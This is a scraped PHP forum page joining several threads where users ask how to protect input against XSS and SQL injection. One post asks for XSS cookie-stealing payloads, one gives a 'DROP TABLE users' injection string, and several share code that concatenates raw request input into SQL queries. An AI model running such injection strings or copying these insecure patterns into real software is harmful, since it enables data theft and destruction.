|
PHP - Xss Injections With Htmlspecialchars($string, Ent_quotes, 'utf-8');
htmlspecialchars($str, ENT_QUOTES, 'UTF-8');Using this code with UTF-8. I need someone to help craft up some smalll xss injections with this. I heard htmlspecialchars doesn't stop all xss attacks, so I'm wondering what's the most xss attack you can craft to load a simple cookie loader. (Basically, just simple javascript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good). Looking for your code to be posted, and once it is.. I'll copy it and submit it through the code I posted above and see if there is any vulnerabilities. (On my localhost server) Thanks! $str = user input. Oh, and here is the BBCODE regex that the code passes through before this function is returned on the text. $text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.
Edited by Monkuar, 10 January 2015 - 06:33 PM. Similar Tutorialshtmlspecialchars($str, ENT_QUOTES, 'UTF-8');Using this code with UTF-8. I need someone to help craft up some smalll xss injections with this. I heard htmlspecialchars doesn't stop all xss attacks, so I'm wondering what's the most xss attack you can craft to load a simple cookie loader. (Basically, just simple javascript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good). Looking for your code to be posted, and once it is.. I'll copy it and submit it through the code I posted above and see if there is any vulnerabilities. (On my localhost server) Thanks! $str = user input. Oh, and here is the BBCODE regex that the code passes through before this function is returned on the text. $text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.
Edited by Monkuar, 10 January 2015 - 06:33 PM. Hello, I'm learning PHP, so a completely noob, right now. First to the question itself, I want to know how to retrieve the data(variables & it's values) from the url, which was made or generated(or whatever right word is) by using http_build_query() in php. I created a querystring($string) with certain variables & dynamic values that I'm passing to a url I am trying to protect my guestbook entries from injections such as html, xss, and mysql injections. My php knowledge is very little. If possible, can I have some help please with protecting my entries. I have a few bits and pieces of code to protect my guestbook from injections that I got from some tutorials that I was reading. Code: [Select] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Author: Reality Software Website: http://www.realitysoftware.ca Note: This is a free template released under the Creative Commons Attribution 3.0 license, which means you can use it in any way you want provided you keep the link to the author intact. --> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title></title> <link href="style.css" rel="stylesheet" type="text/css" /></head> <body> <!-- header --> <div id="header"> <div id="logo"><a href="index.html">Header</a></div> <div id="menu"> <ul> <li><a href="index.html">Home</a></li> <li><a href="">Link 1</a></li> <li><a href="">Link 2</a></li> <li><a href="">Link 3</a></li> <li><a href="">Contact</a></li> <li><a href="guestbook.php">Guestbook</a></li> </ul> </div> </div> <div id="icon"><a href="twitter.com/"> <img border="0" src="http://www.000webhost.com/forum/images/twitter.png" alt="twitter" width="58px;" height="53px;" /> </a></div> <!--end header --> <!-- main --> <div id="main"> <div id="content"> <div id="text"> <h1><strong>Guestbook</strong></h1> </div> <?php $input = is_numeric($input) ? intval($input) : mysql_real_escape_string($input);function sanitizeString($string) { return htmlentities( (string) $string, ENT_COMPAT, "UTF-8" ); } $preparedStatement = $db->prepare('SELECT * FROM guestbook WHERE name = :name'); $preparedStatement->execute(array(':name' => $name)); $rows = $preparedStatement->fetchAll(); $mysql_host = "localhost"; $mysql_database = "a7560006_guest"; $mysql_user = "a7560006_host"; $mysql_password = "mypassword"; // Connect to server and select database. mysql_connect("$mysql_host", "$mysql_user", "$mysql_password") or die("cannot connect server"); mysql_select_db("$mysql_database") or die("cannot select DB"); $tbl_name="guestbook"; // Table name $name = ($_POST['name']); $comment = ($_POST['comment']); $comment = stripslashes($comment); $name = stripslashes($name); $comment = str_replace("<","<",$comment); $name = str_replace("<","<",$name); $datetime=date("M-d-Y h:i:s A"); //date time $verif_box = ($_POST['verif_box']); if(md5($verif_box).'a4xn' != $_COOKIE['tntcon']){ ?> <table width="400" border="0" align="center"> <tr><td align="center"><h4>You have not entered captcha or entered incorrect captcha!</h4></td></tr> </table> </div> <!-- footer --> <div id="footer"> <div id="left_footer">© Copyright 2011<strong> Author </strong></div> <div id="right_footer"> <!-- Please do not change or delete this link. Read the license! Thanks. :-) --> Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a> </div> </div> <!-- end footer --> </div> <!-- end main --> </body> </html> <? exit; } if(empty($name) || empty($comment)) { ?> <table width="400" border="0" align="center"> <tr><td align="center"><h3>Sorry, all fields are required!</h3></td></tr> </table> <? } else { $sql="INSERT INTO $tbl_name (name, comment, datetime) VALUES ('$name', '$comment', '$datetime')"; $result=mysql_query($sql); //check if query successful if($result) { ?> <table width="400" border="0" align="center"> <tr><td align="center"><h3>Thank you for signing my guestbook!</h3></td></tr> </table> <? echo "<meta http-equiv='Refresh' content='1; URL=viewguestbook.php'>"; // link to view guestbook page } else { echo "ERROR"; } mysql_close(); } ?> </div> <!-- footer --> <div id="footer"> <div id="left_footer">© Copyright 2011<strong> Author </strong></div> <div id="right_footer"> <!-- Please do not change or delete this link. Read the license! Thanks. :-) --> Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a> </div> </div> <!-- end footer --> </div> <!-- end main --> </body> </html> Hello, I have been using the preg_match() to throw out invalid form characters and then both mysql_real_escape_string() and stripslashes() to escape data variables before using them with mysql. But how about messages from a text area for example on a contact form. You cant limit the characters for the user. Is escaping variables good enough to eliminate sql injections from user input? Hi everyone, I have been the victim (at least i think) of SQL injection attacks!? I believe this as my contact us db table is full of 1's. How can i stop this from happening? Here's the contact form: Code: [Select] <form method="get" action="contact-send.php"> Name:<br /> <input type="text" name="name" id="name" size="30" /><br /> Email:<br /> <input type="email" name="email" id="email" size="30" /><br /> Your Question:<br /> <textarea name="question" id="question" rows="10" cols="50"></textarea><br /> <input type="submit" name="submit" value="send" /> </form> And here's the script 'contact-send.php': Code: [Select] <?PHP session_start(); include ('php only scripts/db.php'); if(isset($_POST['submit'])){ $name = $_POST['name']; $email = $_POST['email']; $question = $_POST['question']; //your code to insert variables into db can go here or after the if statement $query = "INSERT INTO contact_us (name, email, questions) VALUES ('" .$name. "', '" .$email. "', '" .$question. "')"; $result = mysql_query($query) or die(mysql_error()); echo $name."<br/>".$email."<br/>".$question; } header( 'Location: http://www.removalspace.com/contactconf.php' ); ?> Do i have to have if(isset on EACH variable? like on name, email and question too? I am having problems with a search feature I am using for a website I am building. Everything was working fine when I was testing on my local machine using EasyPHP 3.0. The issue I am having is that once I uploaded the site to a "live" server and tested it, my search function wouldn't work. The issue resides in the two lines with the magic quotes and the real escape string, for some reason those lines worked fine while testing using EasyPHP 3.0, but now I must delete those lines in order for my search function to work. The problem is that deleting those lines makes me vulnerable to an SQL injection. I have tried deleting just the magic quotes line and everything works properly, but then I am not seeing any kind of strip slashing/sanitizing when I enter in a statement like this into my search: a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't. Any help on this issue would be greatly appreciated! //get data $button = $_GET['submit']; if (get_magic_quotes_gpc() == 0){ $search = mysql_real_escape_string($_GET['search']); // clean up the search string } else { $search = $_GET['search']; $limit = 9; $page = $_GET['page']; if($page) $start = ($page - 1) * $limit; I also tried using the mysql_real_escape_string on my construct, but I get syntax errors because of the | being used before and after the $search_each. That | character must remain in place in order for my search to work the way I want it to. $x++; if ($x==1) $construct .= "keywords LIKE '%".mysql_real_escape_string(|$search_each|)."%'"; else $construct .= "AND keywords LIKE '%|$search_each|%'"; } Basically, I have the following code ($c2 is my connection variable): Code: [Select] $rid = $_GET['id']; $q = mysql_query("SELECT * FROM reports WHERE id = $rid", $c2) or die(mysql_error()); $report = mysql_fetch_array($q); $report is used later on to gather more information that is outputted to the user. However, if in the URL, someone were to put id=1', they would have an error message spit out to them (something along the lines of: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1), indicating a SQL Injection exploit. How would I go about fixing this, and also preventing SQL Injection? Thanks a bunch, Mark Here is the code that i am using to accept data and display the data. To accept and add it in database i am using : $comment = $_POST['txtcomment']; $comment = @mysql_real_escape_string($comment); To display the data from DB i am using : $comment = $rowscomment['comment']; <?php echo nl2br($comment); ?> Please help me correct it....... I am still learning PHP. I'm getting this error and not sure my fix. <b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in <b>/home/xtremer/public_html/efedmanager/processes/polls.php</b> on line <b>13</b><br /> $answer = explode(',', $_POST['answersList']); $answer = htmlspecialchars($answer); Hi, should i use htmlspecialchars() when i write in mysql or when i read from mysql, and should i use another function for safety ? Hello and thanks in advance for any help. Overview: Im tyring to pull data from a XML api using simpleXML. I have ran into a problem with special characters and entities that simpleXML does not accept. IE " " Ive tried all the solutions i could find to no avail. SimpleXML gives me this error. parser error : Entity 'nbsp' not defined in Here is my code. Code: [Select] $feed = simplexml_load_file('URL TO API FEED'); $feed = html_entity_decode($feed); $feed = str_ireplace(array('<','>','&','\'','"'),array('<','>','&',''','"'),$feed); echo 'Game Title: ' .$feed->game. '</br>'; echo 'Ponts Earned: ' .$feed->gamerscore. '</br>'; echo 'Total Achievements: ' .$feed->totalachievements. '</br>'; foreach($feed->achievements->achievement as $ach) { $output = htmlentities($feed->title, ENT_QUOTES, "UTF-8"); echo $output; if( !empty($ach->unlockedartwork)){ echo '<img src=' .$ach->unlockedartwork. '></img></br>'; }else { echo '<img src=' .$ach->artwork. '></img></br>'; } } Here is the code im trying to retrieve. Code: [Select] <achievement id="40"> <title>Have Gun Will Travel </title> <artwork>http://</artwork> <gamerscore>20</gamerscore> <unlocked>true</unlocked> <unlockdate>7/4/2010</unlockdate> </achievement> What do most people prefer to use? htmlspecialchars or htmlentities which one is necessary while protecting form field Edited July 28, 2019 by mahendaI need to put this inside of a p tag so I can change some properties but everything I've tried doesn't work and just shows nothing.
I've tried this:
printf('<p style="text-align: left; width: 500px;">', htmlspecialchars($fetch['shout'], ENT_QUOTES, 'UTF-8'), '</p>');
This is what I need to be wrapped in p tags:
htmlspecialchars($fetch['shout'], ENT_QUOTES, 'UTF-8');EDIT: I've noticed the code below works but when I style it inside of the tag the text won't show, should I include a CSS file on the PHP file? echo "<p>".htmlspecialchars($fetch['shout'])."</p>\n";EDIT: I just needed to create the CSS for the p tags in the index and it worked perfectly fine. Sorry for the pointless thread. Edited by Alanay, 18 December 2014 - 09:14 AM. When sending data via $_POST for example, I've seen the data get filtered with both mysql_real_escape_string or htmlspecialchars When should you use one or the other? HI all, Please advice me 1. When to use htmlspecialchars() or mysql_real_escape_string? 2. what is the diffrent? Thank you for your help. Does anyone have an example of when htmlentities() would be used over htmlspecialchars()? Hello dears, I've tried to use htmlspecialchars or htmlentities but both no longer work ! Example1 : Code: [Select] <?php $new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES); echo $new; ?> Output should <a href='test'>Test</a> Code: [Select] <?php $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); ?> Output should A 'quote' is <b>bold</b> But it isn't working ? what is wrong ? Hello Guys ... i am new here and i am also new in php i selfstudy html css and js and bootstrap for front-end and for back-back php & mysql & PDO & OOP and i will soon start mvc then laravel and i am trying to secure my input field and i do not want any attacks or sql injects and i see people user filter_var and htmlentities and htmlspecialchars and each one has diffrent opinion can some one help me and tell me what is the best for securing input which all values will store in database thanks <3
|
|||||||